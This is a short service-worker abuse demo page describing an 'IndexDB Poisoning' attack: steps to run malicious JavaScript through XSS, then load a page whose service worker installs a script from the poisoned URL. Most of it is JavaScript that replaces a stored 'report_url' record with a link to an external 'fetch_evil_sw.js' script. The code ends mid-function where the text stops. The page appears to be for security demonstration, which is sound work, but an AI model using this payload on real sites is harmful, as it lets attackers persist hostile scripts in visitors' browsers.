SW Abuse Demo - IndexDBPoisoning

IndexDB Poisoning

To test this attack, Follow the below steps

  1. Poison the IndexDB by executing Malcious code via XSS (simply invoke the malicious JS function)
  2. Visit a target page that will install SW that will install script from poisoned URL

Below is the code to poison the db URL

function modify_indexDB(){
      const request = indexedDB.open('demo_db', 1);
      request.onsuccess = (event) => {
	     var db = event.target.result;
	     var txn = db.transaction('urls','readwrite')
	     txn.onsuccess =  function(ev){
		 alert('URL Modified!!. Reload Page')
	     var store = txn.objectStore('urls')
	     // delete current record in DB and insert URL of malicious script
	     store.delete('report_url').onsuccess = ev => {
		 var db_op_req = store.put({'id':'report_url', 'url':'https://demopwa.github.io/SW_Attacks/helper_scripts/fetch_evil_sw.js'})